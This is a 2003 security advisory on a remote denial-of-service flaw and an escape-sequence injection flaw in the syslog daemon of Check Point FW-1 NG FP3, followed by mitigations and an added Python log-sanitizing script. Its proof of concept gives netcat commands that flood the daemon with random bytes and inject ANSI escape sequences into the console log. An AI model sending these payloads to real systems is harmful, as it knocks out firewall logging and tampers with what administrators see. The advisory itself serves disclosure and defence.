Check Point DoS attack against syslog daemon

22nd Mar 2003 [SBWID-6087]


	Check Point FW-1 NG FP3 & FP3 HF1


	Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and
	Security GmbH, advisory:
	* Successful remote DoS against the syslog daemon of Check Point FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	* Syslog messages containing escape sequences directed to the syslog
	daemon of Check Point FW-1 NG FP3 (including HF1 and HF2) remain
	unfiltered and cause strange output behaviour if the log is viewed on
	console.
	Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off)
	that redirects incoming syslog messages from remote hosts (e.g.
	routers) to Check Point's SmartTracker logging mechanism. This syslog
	daemon can be crashed remotely, and it will not start again
	automatically. No watchdog service detects the crash, and no entry
	appears in the SmartView Tracker to indicate that the syslog daemon is
	no longer available.
	Additionally, it prints all characters received in a remote syslog
	message without any modification. This means that escape sequences are
	neither filtered nor, e.g., expanded to their octal values in ASCII.
	 Proof of concept
	Start the syslog daemon by enabling it in the firewall object (and
	running cpstop/cpstart afterwards), or by hand by executing:
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger:                               [  OK  ]
	Shutting down system logger:                               [  OK  ]
	Starting system logger:                                    [  OK  ]
	Starting kernel logger:                                    [  OK  ]
	Segmentation fault <- caused after receiving random  syslog  payload,
	see below
	Check for listening syslog daemon:
	 [firewall]# netstat -lnptu |grep -w 514
	 udp     0    0*    $pid/syslog
	Note also that this daemon is running as "root":
	 # ps -ux | grep -w syslog
	 root      $pid  0.0  6.8 148064 8612 ?       S    12:17   0:00 syslog 514 all
	Send a valid syslog message from  a  remote  host  (here  also  a  Linux
	 [evilhost]# echo  "<189>19: 00:01:04: Test" | nc -u firewall 514
	Send random payload via syslog message from a remote host:
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	The previously started syslog daemon should crash after a short time.
	Use "netstat" to see whether a daemon is still listening on UDP port 514.
	Note: for a clean restart of Check Point's syslog  daemon  the  firewall
	service needs to be restarted.
	Enable receiving of syslog from  remote  by  FW-1  like  e.g.  described
	View the log on the console by running the following command:
	 [firewall]# fw log -tfnl
	Send some special escape sequences via syslog, e.g.
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
	Take a look at the console again, but  don't  be  scared  too  much  for
	now... Press CTRL-C and reset the console to standard by executing:
	 [firewall]# reset
	Attackers might send many other "special" escape sequences; for Linux
	as the destination, see "man console_codes" for more.
	Note: the standard syslog daemon on an RHL 7.3 system renders codes
	like this as shown here:
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q


	Solutions to prevent the successful DoS attack against syslog service:
	- Upgrade to FP3 HF2 as soon  as  possible,  see  for  more  information
	(available since 14 March 2003) : 
	- Customize your ruleset and accept syslog messages only from  dedicated
	(and trusted, see below) senders by the enforcement module
	Solutions to prevent unfiltered console output:
	- Filter log output by using "tr" like:
	 [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
	(all chars with ASCII codes from decimal 0-31 and 128-255, except
	10 for LF, are replaced by a '*')
	- Update Check Point's syslog daemon to newer version once  again,  when
	available :
	- Improve ruleset like suggested above.
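A variant of the "tr" filter above, as an added example (not part of the AERAsec advisory or of Check Point's software): instead of replacing every control byte with '*', it shows them in the caret notation seen in the RHL 7.3 syslog line above, so the reader can still tell what was sent. The octal rendering of bytes 128-255, the doubling of backslashes, the script name logsafe.py and the function name sanitize are assumptions of this example.

```python
#!/usr/bin/env python3
"""Added example: make control bytes in untrusted log output visible."""
import sys


def sanitize(raw: bytes) -> str:
    """Return raw log bytes as text that is safe to print on a terminal.

    LF (10) is kept so records stay on separate lines. Other C0 controls
    become caret notation (BEL -> ^G, ESC -> ^[), DEL becomes ^?, bytes
    128-255 become \\ooo octal escapes, and a literal backslash is doubled
    so an octal escape in the output cannot be forged by the sender.
    """
    out = []
    for b in raw:
        if b == 0x5C:                       # literal backslash
            out.append("\\\\")
        elif b == 0x0A or 0x20 <= b <= 0x7E:  # LF and printable ASCII
            out.append(chr(b))
        elif b < 0x20:                      # C0 control, e.g. ESC (27) -> ^[
            out.append("^" + chr(b + 0x40))
        elif b == 0x7F:                     # DEL
            out.append("^?")
        else:                               # 128-255
            out.append("\\%03o" % b)
    return "".join(out)


# Constructed sample: the payload of the advisory's "echo -e" test message.
SAMPLE = (b"<189>19: 00:01:04:Test\a\x1b[2J\x1b[2;5m\x1b[1;31mHACKER~ATTACK"
          b"\x1b[2;25m\x1b[22;30m\x1b[3q\n")


def main() -> None:
    if sys.stdin.isatty():
        # No pipe attached: show the effect on the constructed sample.
        sys.stdout.write(sanitize(SAMPLE))
        return
    # Filter mode: read raw bytes line by line so "follow" output keeps flowing.
    for line in sys.stdin.buffer:
        sys.stdout.write(sanitize(line))
        sys.stdout.flush()


if __name__ == "__main__":
    main()
```

On a host with Python 3, pipe the log viewer into it in place of "tr": fw log -tfnl | python3 logsafe.py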

